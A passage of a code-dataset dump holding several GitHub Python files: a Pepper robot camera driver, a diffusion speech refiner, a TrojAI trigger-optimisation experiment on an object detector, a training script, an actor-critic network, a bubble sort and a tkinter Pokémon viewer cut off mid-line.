self.__set_parameter(\"saturation\", camera_setting)\n\n def set_gamma(self, camera_setting):\n pass\n\n def set_shutter(self, camera_setting):\n pass\n\n def set_gain(self, camera_setting):\n self.__set_parameter(\"gain\", camera_setting)\n\n def set_white_balance_bu(self, camera_setting):\n pass\n\n def set_white_balance_rv(self, camera_setting):\n pass\n\n def set_zoom(self, camera_setting):\n pass\n\n def set_iris(self, camera_setting):\n pass\n\n def get_brightness(self):\n return self.__get_parameter(\"brightness\")\n\n def get_exposure(self):\n return self.__get_parameter(\"exposure\")\n\n def get_focus(self):\n return self.__get_parameter(\"focus\")\n\n def get_sharpness(self):\n return None\n\n def get_hue(self):\n return self.__get_parameter(\"hue\")\n\n def get_saturation(self):\n return self.__get_parameter(\"saturation\")\n\n def get_gamma(self):\n return None\n\n def get_shutter(self):\n return None\n\n def get_gain(self):\n return self.__get_parameter(\"gain\")\n\n def get_white_balance_bu(self):\n return None\n\n def get_white_balance_rv(self):\n return None\n\n def get_zoom(self):\n return None\n\n def get_iris(self):\n return None\n\n def start_capture(self):\n with self.lock:\n resolution = resolution_is_to_naoqi(self.resolution)\n color_space = color_space_is_to_naoqi(self.color_space)\n name = \"is::PepperCameraDriver.{}\".format(self.camera_id)\n self.camera = self.video.subscribeCamera(name, self.camera_id,\n resolution, color_space,\n int(self.fps))\n self.deadline = time.time() + 1.0 / self.fps\n\n def stop_capture(self):\n with self.lock:\n self.video.unsubscribe(self.camera)\n\n def grab_image(self):\n with self.lock:\n diff = self.deadline - time.time()\n\n if diff > 0:\n time.sleep(diff)\n\n with self.lock:\n if diff < 0:\n self.deadline = time.time()\n\n before_get = time.time()\n frame = self.video.getImageRemote(self.camera)\n\n proc_begin = time.time()\n\n width, height, buffer = frame[0], frame[1], frame[6]\n mat = np.frombuffer(\n buffer, dtype=np.uint8).reshape(height, width, -1)\n if self.color_space == ColorSpaces.Value(\"GRAY\"):\n mat = cv2.cvtColor(mat, cv2.COLOR_BGR2GRAY)\n image = cv2.imencode(\n ext=self.encode_format, img=mat, params=self.encode_parameters)\n\n proc_end = time.time()\n\n self.logger.debug(\n \"[GrabImage] New Frame (get={:.1f}ms, proc={:.1f}ms, next_in={:.1f}ms)\",\n (proc_begin - before_get) * 1000,\n (proc_end - proc_begin) * 1000, diff * 1000)\n self.deadline += 1.0 / self.fps\n\n return Image(data=image[1].tobytes())\n\n def get_pose(self):\n tf = FrameTransformation()\n with self.lock:\n setattr(tf, \"from\", self.camera_frame_id)\n setattr(tf, \"to\", self.base_frame_id)\n if self.camera_id == kPepperTopCamera:\n effector = \"CameraTop\"\n elif self.camera_id == kPepperBottomCamera:\n effector = \"CameraBottom\"\n elif self.camera_id == kPepperDepthCamera:\n effector = \"CameraDepth\"\n\n use_sensors = True\n rows = tf.tf.shape.dims.add()\n rows.size = 4\n rows.name = \"rows\"\n\n cols = tf.tf.shape.dims.add()\n cols.size = 4\n cols.name = \"cols\"\n\n tf.tf.type = DataType.Value(\"DOUBLE_TYPE\")\n Tcam_to_base = np.matrix(\n self.motion.getTransform(effector, qimotion.FRAME_ROBOT,\n use_sensors)).reshape(4, 4)\n Rz = np.matrix([[np.cos(-np.pi/2), -np.sin(-np.pi/2), 0, 0], \\\n [np.sin(-np.pi/2), np.cos(-np.pi/2), 0, 0], \\\n [0, 0, 1, 0], \\\n [0, 0, 0, 1]])\n\n Rx = np.matrix([[1, 0, 0, 0], \\\n [0, np.cos(-np.pi/2), -np.sin(-np.pi/2), 0], \\\n [0, np.sin(-np.pi/2), np.cos(-np.pi/2), 0], \\\n [0, 0, 0, 1]])\n\n # Fix frame orientation so that the z axis is aligned with the camera\n T = Tcam_to_base * Rz * Rx\n tf.tf.doubles.extend(T.reshape(1, -1).tolist()[0])\n\n return tf\n","repo_name":"labviros/is-pepper-gateways","sub_path":"camera-gateway/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"70370245388","text":"import random\nimport torch\n\nfrom model.base import BaseModule\nfrom model.diffusion import Diffusion\nfrom model.utils import sequence_mask, fix_len_compatibility\n\n\nclass DiffRefiner(BaseModule):\n def __init__(self, n_feats, use_text, dec_dim, beta_min, beta_max, pe_scale):\n super(DiffRefiner, self).__init__()\n self.n_feats = n_feats\n self.use_text = use_text\n self.dec_dim = dec_dim\n self.beta_min = beta_min\n self.beta_max = beta_max\n self.pe_scale = pe_scale\n\n self.decoder = Diffusion(dec_dim, n_feats, use_text, beta_min, beta_max, pe_scale)\n\n @torch.no_grad()\n def forward(self, y, y_lengths, n_timesteps, temperature=1.0, stoc=False, mu=None):\n \"\"\"\n Enhance mel-spectrograms.\n \n Args:\n y (torch.Tensor): batch of mel-spectrograms, padded.\n y_lengths (torch.Tensor): length of mel-spectrograms in batch.\n n_timesteps (int): number of steps to use for reverse diffusion in decoder.\n temperature (float, optional): controls variance of terminal distribution.\n stoc (bool, optional): deprecated argument when using the dpm solver.\n mu (torch.Tensor): average mel-spectrogram corresponding to the text. only used for DMSEtext.\n \"\"\"\n y, y_lengths = self.relocate_input([y, y_lengths])\n\n y_max_length = int(y_lengths.max())\n y_max_length_ = fix_len_compatibility(y_max_length)\n\n # Using obtained durations `w` construct alignment map `attn`\n y_mask = sequence_mask(y_lengths, y_max_length_).unsqueeze(1).to(y.dtype)\n if y_max_length < y_max_length_:\n y = torch.cat((y, y.new(y.shape[0], y.shape[1], y_max_length_-y_max_length).zero_()), dim=2)\n if not isinstance(mu, type(None)):\n mu = torch.cat(\n (mu, mu.new(mu.shape[0], mu.shape[1], y_max_length_-y_max_length).zero_()), dim=2)\n\n # Sample latent representation from terminal distribution N(mu_y, I)\n z = torch.randn_like(y, device=y.device) / temperature\n # Generate sample by performing reverse dynamics\n decoder_outputs = self.decoder(z, y_mask, y, n_timesteps, stoc, mu)\n decoder_outputs = decoder_outputs[:, :, :y_max_length]\n\n return decoder_outputs\n\n\n def compute_loss(self, x, y, y_lengths, mu=None, out_size=None):\n \"\"\"\n Compute the diffusion loss\n \n Args:\n x (torch.Tensor): batch of clean mel-spectrograms.\n y (torch.Tensor): batch of the corresponding degraded mel-spectrograms.\n y_lengths (torch.Tensor): length of mel-spectrograms in batch.\n mu (torch.Tensor): average mel-spectrogram corresponding to the text. only used for DMSEtext.\n out_size (int, optional): length (in mel's sampling rate) of segment to cut, on which decoder will be trained.\n Should be divisible by 2^{num of UNet downsamplings}. Needed to increase batch size.\n \"\"\"\n x, y, y_lengths = self.relocate_input([x, y, y_lengths])\n\n y_max_length = y.shape[-1]\n\n y_mask = sequence_mask(y_lengths, y_max_length).unsqueeze(1).to(y)\n\n # Cut a small segment of mel-spectrogram in order to increase batch size\n if not isinstance(out_size, type(None)):\n max_offset = (y_lengths - out_size).clamp(0)\n offset_ranges = list(zip([0] * max_offset.shape[0], max_offset.cpu().numpy()))\n out_offset = torch.LongTensor([\n torch.tensor(random.choice(range(start, end)) if end > start else 0)\n for start, end in offset_ranges\n ]).to(y_lengths)\n \n y_cut = torch.zeros(\n y.shape[0], self.n_feats, out_size, dtype=y.dtype, device=y.device)\n x_cut = torch.zeros(\n x.shape[0], self.n_feats, out_size, dtype=x.dtype, device=x.device)\n if not isinstance(mu, type(None)):\n mu_cut = torch.zeros(\n mu.shape[0], self.n_feats, out_size, dtype=mu.dtype, device=mu.device)\n else:\n mu_cut = None\n\n y_cut_lengths = []\n for i, (y_, x_, out_offset_) in enumerate(zip(y, x, out_offset)):\n y_cut_length = out_size + (y_lengths[i] - out_size).clamp(None, 0)\n y_cut_lengths.append(y_cut_length)\n cut_lower, cut_upper = out_offset_, out_offset_ + y_cut_length\n y_cut[i, :, :y_cut_length] = y_[:, cut_lower:cut_upper]\n x_cut[i, :, :y_cut_length] = x_[:, cut_lower:cut_upper]\n if not isinstance(mu, type(None)):\n mu_cut[i, :, :y_cut_length] = mu[i, :, cut_lower:cut_upper]\n y_cut_lengths = torch.LongTensor(y_cut_lengths)\n y_cut_mask = sequence_mask(y_cut_lengths, max_length=out_size).unsqueeze(1).to(y_mask)\n \n y = y_cut\n x = x_cut\n mu = mu_cut\n y_mask = y_cut_mask\n\n # Compute loss of score-based decoder\n diff_loss, _ = self.decoder.compute_loss(x, y_mask, y, mu)\n\n return diff_loss","repo_name":"dmse4tts/DMSE4TTS","sub_path":"model/refiner.py","file_name":"refiner.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"82"} +{"seq_id":"163468028","text":"import os\nimport numpy as np\nimport torch\nimport cv2\nimport torchvision\nimport json\nimport load_dataset\n# import PIL.Image\nimport polygon_trigger\n\n\nFILEPATH = '/scratch/jialin/round-10/projects/object_detection/models/id-00000009' \nTRIAL_OUTPUT = '/scratch/jialin/round-10/projects/object_detection/test_output/toy_clean/unconstrained'\nTOY_OUTPUT = '/scratch/jialin/round-10/projects/object_detection/test_output/toy_clean'\n\ndef prepare_boxes(anns, image_id):\n if len(anns) > 0:\n boxes = []\n class_ids = []\n for answer in anns:\n boxes.append(answer['bbox'])\n class_ids.append(answer['category_id'])\n\n class_ids = np.stack(class_ids)\n boxes = np.stack(boxes)\n # convert [x,y,w,h] to [x1, y1, x2, y2]\n boxes[:, 2] = boxes[:, 0] + boxes[:, 2]\n boxes[:, 3] = boxes[:, 1] + boxes[:, 3]\n else:\n class_ids = np.zeros((0))\n boxes = np.zeros((0, 4))\n\n degenerate_boxes = (boxes[:, 2:] - boxes[:, :2]) < 8\n degenerate_boxes = np.sum(degenerate_boxes, axis=1)\n if degenerate_boxes.any():\n boxes = boxes[degenerate_boxes == 0, :]\n class_ids = class_ids[degenerate_boxes == 0]\n target = {}\n target['boxes'] = torch.as_tensor(boxes)\n target['labels'] = torch.as_tensor(class_ids).type(torch.int64)\n target['image_id'] = torch.as_tensor(image_id)\n return target\n\n\ndef get_class_id_to_name_dict():\n '''\n returns {coco_category_id [int] : coco_category_name [str]}\n '''\n cat_txt = open('/scratch/jialin/round-10/projects/object_detection/cat_label/coco-labels-paper.txt', 'r')\n data = cat_txt.read()\n cat_lst = data.split('\\n')\n cat_txt.close()\n cat_dict = {str(k+1) : v for k, v in enumerate(cat_lst)}\n return cat_dict\n\ndef get_output_from_example_images(model, EXAMPLE_PATH, device):\n images_filepaths = [os.path.join(EXAMPLE_PATH, img) for img in os.listdir(EXAMPLE_PATH) if img.endswith('.jpg')]\n images_filepaths.sort()\n\n target = {}\n images, targets, ids = [], [], []\n for img_filepath in images_filepaths:\n image_id = os.path.basename(img_filepath)\n image_id = int(image_id.replace('.jpg',''))\n img = cv2.imread(img_filepath, cv2.IMREAD_UNCHANGED)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n with open(img_filepath.replace('.jpg', '.json')) as json_file:\n annotations = json.load(json_file)\n\n target = prepare_boxes(annotations, image_id)\n\n # with torch.no_grad():\n img = torch.as_tensor(img).permute((2, 0, 1))\n img = torchvision.transforms.functional.convert_image_dtype(img, torch.float)\n\n images.append(img)\n targets.append(target)\n ids.append(image_id)\n \n # with torch.no_grad():\n images = list(image.to(device) for image in images)\n images = [img.requires_grad_() for img in images]\n targets = [{k: v.to(device) for k, v in t.items()} for t in targets]\n \n outputs = model(images, targets)\n\n return {'image_id': ids, 'outputs': outputs, 'images': images}\n\n\ndef get_output_images(OUTPUT_DIR, EXAMPLE_PATH, example_outputs, number_of_detection=3):\n ids = example_outputs['image_id']\n outputs = example_outputs['outputs']\n if isinstance(outputs, tuple):\n outputs = outputs[1]\n\n example_images = [os.path.join(EXAMPLE_PATH, img) for img in os.listdir(EXAMPLE_PATH) if img.endswith('.jpg')]\n example_images.sort()\n\n for ind, out in enumerate(outputs):\n img = cv2.imread(example_images[ind], cv2.IMREAD_UNCHANGED)\n for i in range(number_of_detection):\n x1, y1, x2, y2 = out['boxes'][i]\n label = out['labels'][i]\n cat_name = cat_dict[str(label.item())]\n img = cv2.rectangle(img, (int(x1.item()), int(y1.item())), (int(x2.item()), int(y2.item())), (255, 0, 0), 2)\n img = cv2.putText(img, cat_name, (int(x1.item()), int(y1.item()) + 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2)\n cv2.imwrite(OUTPUT_DIR+'/'+str(ids[ind])+'.jpg', img)\n\n\ndef save_images_with_gradient(OUTPUT_DIR, example_outputs):\n ids = example_outputs['image_id']\n outputs = example_outputs['outputs']\n images = example_outputs['images']\n outputs[0]['classification'].backward()\n for ind, img in enumerate(images):\n grad_img = img.grad.cpu().permute(1, 2, 0).numpy()\n grad_img -= grad_img.min()\n grad_img /= grad_img.max()\n grad_img *= 255\n grad_img = grad_img.astype(int)\n\n cv2.imwrite(OUTPUT_DIR+'/'+str(ids[ind])+'.jpg', grad_img)\n\n\ndef process_image(output_data_from_model):\n img = output_data_from_model.cpu().detach().permute(1, 2, 0).numpy()\n img -= img.min()\n img /= img.max()\n img *= 255\n img = img.astype(int)\n return img\n\n\ndef process_image_without_normalize(output_data_from_model):\n img = output_data_from_model.cpu().detach().permute(1, 2, 0).numpy()\n # img -= img.min()\n # img /= img.max()\n # img *= 255\n img = img.astype(int)\n return img\n\n\ndef save_grad_and_output_images(img_output, grad_output, ind):\n if grad_output is not None:\n # grad_image = process_image(grad_output)\n grad_output_filepath = os.path.join(TRIAL_OUTPUT, 'grad')\n cv2.imwrite(grad_output_filepath+'/'+str(ind)+'.jpg', np.asarray(torchvision.transforms.ToPILImage()(grad_output.cpu())))\n # cv2.imwrite(grad_output_filepath+'/'+str(ind)+'.jpg', grad_image)\n # image = process_image(img_output)\n img_output_filepath = os.path.join(TRIAL_OUTPUT, 'image_output')\n cv2.imwrite(img_output_filepath+'/'+str(ind)+'.jpg', np.asarray(torchvision.transforms.ToPILImage()(img_output.cpu())))\n # cv2.imwrite(img_output_filepath+'/'+str(ind)+'.jpg', image)\n\n\ndef insert_trigger(image, trigger):\n tri_w, tri_h = trigger.shape[1], trigger.shape[2]\n tri_img = image[:,10:10+tri_w, 10:10+tri_h]\n tri_mask = trigger != 0\n tri_img[tri_mask] = trigger[tri_mask]\n image[:,10:10+tri_w, 10:10+tri_h] = tri_img\n return image\n\n\ncat_dict = get_class_id_to_name_dict()\n\nPATH_WITH_ID = FILEPATH\nMODEL_PATH = os.path.join(PATH_WITH_ID, 'model.pt')\nTRIGGER_PATH = os.path.join(PATH_WITH_ID, 'trigger_0.png')\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n# load coco dataset - load a list of tuples [(tensor of image, annotations)]\nclean_images = load_dataset.filter_by_id([17], 30)\ntrigger = np.zeros(shape=(50, 50, 3))\n# trigger = cv2.imread(TRIGGER_PATH, cv2.IMREAD_UNCHANGED)\n# trigger = cv2.cvtColor(trigger, cv2.COLOR_BGR2RGB)\n# trigger = cv2.resize(trigger, (50, 50))\n\ntrigger = torch.as_tensor(trigger).permute((2, 0, 1))\ntrigger = torchvision.transforms.functional.convert_image_dtype(trigger, torch.float)\ncv2.imwrite(TRIAL_OUTPUT+'/'+'trigger_0.jpg', np.asarray(torchvision.transforms.ToPILImage()(trigger)))\n\n\n# load image and target\nimages, targets = [], []\n# ind = 1\nfor img, tgt in clean_images:\n img = insert_trigger(img, trigger)\n img = img.to(device)\n img = img.requires_grad_()\n images.append(img)\n tgt = prepare_boxes(tgt, tgt[0]['image_id'])\n tgt = {k:v.to(device) for k, v in tgt.items()}\n targets.append(tgt)\n # ind += 1\n\n# load model\ntest_model = torch.load(MODEL_PATH)\ntest_model.to(device)\ntest_model.eval()\n\n\ntotal_steps, EPSILON = 25, 20\nLOSS, DELTA_NORM = [], []\noutputs = []\n\nimg, tgt = images[-1], targets[-1]\n\nfor step in range(1, total_steps+1):\n img = img.to(device).requires_grad_()\n if torch.all(img >= 0.) and torch.all(img <= 1.):\n img.retain_grad()\n output = test_model([img], [tgt])\n print('step: ', step, 'loss: ', output[0]['classification'].item())\n output[0]['classification'].backward()\n\n img_grad = img.grad\n save_grad_and_output_images(img, img_grad, step)\n\n trigger_grad = img_grad.cpu()\n updates = []\n for i in range(3):\n # updates.append(trigger[i] + torch.mean(trigger_grad[i]/torch.linalg.norm(torch.linalg.norm(trigger_grad[i], dim=1, ord=2), ord=2))*EPSILON*2.5/step)\n updates.append(trigger[i]+torch.mean(trigger_grad[i])*EPSILON*2.5/step)\n trigger = torch.stack(updates)\n\n test_model.zero_grad()\n img = img.detach().cpu()\n\n img = insert_trigger(img, trigger)\n img = img - img.min()\n img = img / img.max()\n cv2.imwrite(TRIAL_OUTPUT+'/'+'trigger_'+ str(step)+ '.jpg', np.asarray(torchvision.transforms.ToPILImage()(trigger)))\n # outputs.append({'scores': output[1][0]['scores'][:10], 'labels': output[1][0]['labels'][:10], 'boxes': output[1][0]['boxes'][:10]})\n else:\n break\n\n# print(outputs)\n# print('LOSS: ', LOSS)\n# print('DELTA_NORM: ', DELTA_NORM)","repo_name":"jsong2333333/round-10","sub_path":"projects/object_detection/src/toy_example_with_coco_clean.py","file_name":"toy_example_with_coco_clean.py","file_ext":"py","file_size_in_byte":8680,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"38069452471","text":"import os\nfrom shutil import copyfile\n\nfrom tqdm import tqdm\nfrom statistics import mean\nfrom fastprogress import master_bar, progress_bar\nimport torch\nimport wandb\nfrom adabelief_pytorch import AdaBelief\n\nfrom modules.single_tf import SingleNet\nfrom modules.oracle.oracle import Oracle\nfrom utils.utils import load_vocab, seed_everything\nfrom utils.dataloader import get_dataloader, get_test_loader\nfrom utils.consts import RICH_DIM, BASE_DIM\nfrom utils.scheduler import get_linear_schedule_with_warmup\n\n# logging\nfrom logging import getLogger\nlogger = getLogger(__name__)\n\n\ndef train_single_tf(args):\n \"\"\"\n Parameters\n ----------\n args : ArgumentParser\n \"\"\"\n seed_everything(args.seed)\n device = f'cuda:{args.gpu_id}' if torch.cuda.is_available() else 'cpu'\n logger.info(f'Detected device type: {device}')\n\n # Copy the yaml to the temporal directory\n dest = os.path.join(args.save_dir, os.path.basename(args.yaml_path))\n if args.yaml_path != dest:\n copyfile(args.yaml_path, dest)\n\n # wandb\n if not args.off_wandb:\n wandb.init(\n project='single_model',\n entity='aaai_2020',\n name=os.path.basename(args.save_dir),\n )\n wandb.config.update(args)\n wandb.save(dest)\n\n vocab = load_vocab(args.vocab_path)\n\n # Modeling\n spatial_dim = RICH_DIM if args.proposed_model_mode else BASE_DIM\n net = SingleNet(\n device,\n args.cropped_img_enc_dim + spatial_dim,\n vocab,\n args.ans_vocab_size,\n args.gen_seq_len,\n args.load_guesser,\n args.load_generator,\n args.proposed_q_gen_top_k,\n args.split_class_size,\n args.image_data_version,\n max_batch_size=args.batch_size,\n obj_memory_only=args.obj_memory_only,\n )\n\n # Data Loading\n train_loader, val_loader = get_dataloader(args, multi_q_ver=True)\n\n # ========================================================================\n # Configurations\n # ========================================================================\n # optimizer\n if args.enc_only:\n logger.info('Training only Encoder(=Guesser) Mode !')\n params = net.encoder.parameters()\n else:\n params = list(net.encoder.parameters()) + list(net.decoder.parameters())\n\n if args.adabelief:\n # ref: https://github.com/juntang-zhuang/Adabelief-Optimizer\n optimizer = AdaBelief(\n params,\n args.lr,\n eps=1e-16,\n betas=(0.9, 0.999),\n weight_decouple=True,\n rectify=False, # use SGD for warmup at first when True\n )\n else:\n optimizer = torch.optim.Adam(params, args.lr)\n\n # scheduler\n if args.num_warmup_epochs > 0:\n logger.info('LinearScheduleWarmup using!')\n data_size = len(train_loader.dataset)\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n args.num_warmup_epochs * (data_size // args.batch_size),\n args.epochs * (data_size // args.batch_size),\n )\n\n init_epoch = 1\n best_loss = 1e7\n early_stop_count = 0\n\n # TODO: load pre-trained model & info\n\n # Learning\n mb = master_bar(range(init_epoch, args.epochs + 1))\n for epoch in mb:\n train_so_losses = []\n train_prg_losses = []\n valid_so_losses = []\n valid_prg_losses = []\n\n # Training loop\n for data in progress_bar(train_loader, parent=mb):\n # TODO: track guesser loss & qgen loss separately\n train_so_loss, train_prg_loss = net.pretrain_net(\n data,\n is_train=True,\n enc_only=args.enc_only,\n proposed_model_mode=args.proposed_model_mode,\n idk_mode=args.idk_mode,\n )\n optimizer.zero_grad()\n if args.enc_only:\n train_so_loss.backward()\n else:\n (train_so_loss + train_prg_loss).backward()\n\n optimizer.step()\n if args.num_warmup_epochs > 0:\n # update scheduler\n scheduler.step()\n\n train_so_losses.append(train_so_loss.item())\n train_prg_losses.append(train_prg_loss.item())\n\n # Validation loop\n for data in progress_bar(val_loader, parent=mb):\n valid_so_loss, valid_prg_loss = net.pretrain_net(\n data,\n is_train=False,\n enc_only=args.enc_only,\n proposed_model_mode=args.proposed_model_mode,\n idk_mode=args.idk_mode,\n )\n valid_so_losses.append(valid_so_loss.item())\n valid_prg_losses.append(valid_prg_loss.item())\n\n # --------------------\n # Model Saving\n # --------------------\n epoch_loss = mean(valid_so_losses) + mean(valid_prg_losses)\n if epoch_loss < best_loss:\n # update model\n best_loss = epoch_loss\n early_stop_count = 0\n save_dict = {\n 'next_epoch': epoch + 1,\n 'best_loss': best_loss,\n 'optimizer': optimizer.state_dict(),\n }\n net.save_models(save_dict, args.save_guesser, args.save_generator)\n else:\n early_stop_count += 1\n if early_stop_count == args.patience:\n logger.info(f'Early Stopping: epoch {epoch}')\n break\n\n # logging\n msg = (\n 'epoch: {}/{} - lr: {:.6f} - '\n 'train_so_loss: {:.5f} - val_so_loss: {:.5f} - '\n 'train_prg_loss: {:.5f} - val_prg_loss: {:.5f} - '\n 'train_loss: {:.5f} - val_loss: {:.5f}'\n ).format(\n epoch,\n args.epochs,\n optimizer.state_dict()['param_groups'][0]['lr'],\n mean(train_so_losses),\n mean(valid_so_losses),\n mean(train_prg_losses),\n mean(valid_prg_losses),\n mean(train_so_losses) + mean(train_prg_losses),\n mean(valid_so_losses) + mean(valid_prg_losses),\n )\n logger.info(msg)\n\n # ----------------------\n # Logging wandb\n # ----------------------\n if not args.off_wandb:\n curr_lr = optimizer.state_dict()['param_groups'][0]['lr']\n logging_info_dict = {\n 'learning_rate': curr_lr,\n 'train_so_loss': mean(train_so_losses),\n 'valid_so_loss': mean(valid_so_losses),\n 'train_prg_loss': mean(train_prg_losses),\n 'valid_prg_loss': mean(valid_prg_losses),\n 'train_loss': mean(train_so_losses) + mean(train_prg_losses),\n 'valid_loss': mean(valid_so_losses) + mean(valid_prg_losses),\n 'best_loss': best_loss,\n }\n wandb.log(logging_info_dict)\n\n\ndef check_single_tf(args):\n \"\"\"\n Parameters\n ----------\n args : ArgumentParser\n \"\"\"\n seed_everything(args.seed)\n device = f'cuda:{args.gpu_id}' if torch.cuda.is_available() else 'cpu'\n logger.info(f'Detected device type: {device}')\n\n vocab = load_vocab(args.vocab_path)\n\n # Modeling\n spatial_dim = RICH_DIM if args.proposed_model_mode else BASE_DIM\n net = SingleNet(\n device,\n args.cropped_img_enc_dim + spatial_dim,\n vocab,\n args.ans_vocab_size,\n args.gen_seq_len,\n args.load_guesser,\n args.load_generator,\n args.proposed_q_gen_top_k,\n args.split_class_size,\n args.image_data_version,\n max_batch_size=args.batch_size,\n obj_memory_only=args.obj_memory_only,\n )\n\n oracle = Oracle(\n args.metadata_path,\n os.path.join('data/', args.image_data_version, args.scene_test_path),\n args.vocab_path,\n args.image_data_version,\n )\n\n # Data Loading\n test_loader = get_test_loader(args, multi_q_ver=True)\n\n for i_data, data in enumerate(tqdm(test_loader)):\n show_example = True if i_data == 0 else False\n net.check_results(\n data,\n oracle,\n args.proposed_model_mode,\n args.idk_mode,\n show_example=show_example\n )\n net.show_total_results()","repo_name":"smatsumori/uniqer","sub_path":"src/scripts/train_single_tf.py","file_name":"train_single_tf.py","file_ext":"py","file_size_in_byte":8218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"39852653387","text":"from tensorflow.keras import Model\r\nfrom tensorflow.keras.layers import Dense\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\nclass ACNetwork(Model):\r\n def __init__(self, num_actions):\r\n super(ACNetwork, self).__init__()\r\n self.num_actions = num_actions\r\n self.fc1 = Dense(1024, activation='relu')\r\n self.fc2 = Dense(512, activation='relu')\r\n self.softmax = Dense(num_actions, activation='softmax')\r\n self.value = Dense(1, activation='linear')\r\n\r\n def call(self, x):\r\n x = self.fc1(x)\r\n x = self.fc2(x)\r\n policy = self.softmax(x)\r\n value = self.value(x)\r\n return policy, value\r\n\r\nif __name__ == '__main__':\r\n network = ACNetwork(4)\r\n test = tf.ones((1, 4))\r\n policy, value = network(test)\r\n policy = policy.numpy()\r\n print(policy.shape)","repo_name":"Devanshu-singh-VR/Reinforcement-Learning-Mixed","sub_path":"Actor-Critic/ActorCritic(Tensorflow Torch)/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"22490632282","text":"#The main difference between bubble sort and insertion sort is that\n#bubble sort performs sorting by checking the neighboring data elements and swapping them if they are in wrong order\n#while insertion sort performs sorting by transferring one element to a partially sorted array at a time.\n\n#BUBBLE SORT\nmyList = [15,24,62,53,25,12,51]\nmaxIndex = 6 #remember its maxIndex not max number of elements\nprint('This is the unsorted list ' + str(myList))\nn = maxIndex\nfor i in range(maxIndex):\n for j in range (n):\n if (myList[j] > myList[j+1]):\n temp = myList[j]\n myList[j] = myList[j+1]\n myList[j+1] = temp\n n-=1\n\nprint('This is the sorted list ' + str(myList))\n","repo_name":"nazhimkalam/Complete-Python-Crash-Couse-Tutorials-Available","sub_path":"completed Tutorials/bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"19778878163","text":"from tkinter import *\nfrom tkinter import ttk\nfrom poke_api import search_for_pokemon\nfrom tkinter import messagebox\n\n\n\nroot = Tk()\nroot.title(\"Pokèmon Information Viewer\")\nroot.resizable(False, False)\n\n# Add Frames to window\nfrm_top = ttk.Frame(root)\nfrm_top.grid(row=0, column=0, columnspan=2, pady=(20, 10))\n\nfrm_btm_left = ttk.LabelFrame(root, text='Info')\nfrm_btm_left.grid(row=1, column=0, padx=(20, 10), pady=(10, 20), sticky=N)\n\nfrm_btm_right = ttk.LabelFrame(root, text='Pokèmon Stats')\nfrm_btm_right.grid(row=1, column=1, padx=(10, 20), pady=(10, 20))\n\n\n#Add widgets to frames\nlbl_name = ttk.Label(frm_top, text='Pokèmon name:')\nlbl_name.grid(row=0, column=0, padx=(10,5), pady=10)\n\n# Create Entry box for Pokemon names\nent_name = ttk.Entry(frm_top)\nent_name.grid(row=0, column=1)\n\n# populate widgets in the info box.\nlbl_height = ttk.Label(frm_btm_left, text='Height:')\nlbl_height.grid(row=0, column=0, padx=(10,5), pady=10)\nlbl_height_value = ttk.Label(frm_btm_left, text='TBD:')\nlbl_height_value.grid(row=0, column=1, padx=(5,5), pady=10)\n\nlbl_weight = ttk.Label(frm_btm_left, text='Weight:')\nlbl_weight.grid(row=1, column=0, padx=(10,5), pady=10)\nlbl_weight_value = ttk.Label(frm_btm_left, text='TBD:')\nlbl_weight_value.grid(row=1, column=1, padx=(5,5), pady=10)\n\nlbl_type = ttk.Label(frm_btm_left, text='Type:')\nlbl_type.grid(row=2, column=0, padx=(10,5), pady=10)\nlbl_type_value = ttk.Label(frm_btm_left, text='TBD:')\nlbl_type_value.grid(row=2, column=1, padx=(5,5), pady=10)\n\n# Populate widgets in the stats frame. \nlbl_hp = ttk.Label(frm_btm_right, text='HP:')\nlbl_hp.grid(row=0, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_hp = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_hp.grid(row=0,column=1, padx=(0,10), pady=5)\n\nlbl_attack = ttk.Label(frm_btm_right, text='Attack:' )\nlbl_attack.grid(row=1, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_attack = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_attack.grid(row=1,column=1, padx=(0,10), pady=5)\n\nlbl_defense = ttk.Label(frm_btm_right, text='Defense:')\nlbl_defense.grid(row=2, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_defense = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_defense.grid(row=2,column=1, padx=(0,10), pady=5)\n\nlbl_spec_atk = ttk.Label(frm_btm_right, text='Special Attack:')\nlbl_spec_atk.grid(row=3, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_spec_atk = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_spec_atk.grid(row=3,column=1, padx=(0,10), pady=5)\n\nlbl_spec_def = ttk.Label(frm_btm_right, text='Special Defense:')\nlbl_spec_def.grid(row=4, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_spec_def = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_spec_def.grid(row=4,column=1, padx=(0,10), pady=5)\n\nlbl_speed = ttk.Label(frm_btm_right, text='Speed:')\nlbl_speed.grid(row=5, column=0, sticky=E, padx=(10,5), pady=(10,5))\nbar_speed = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_speed.grid(row=5,column=1, padx=(0,10), pady=5)\n\n# Create event handle for get info button\ndef handle_get_info():\n # Get Pokemon name entered by the 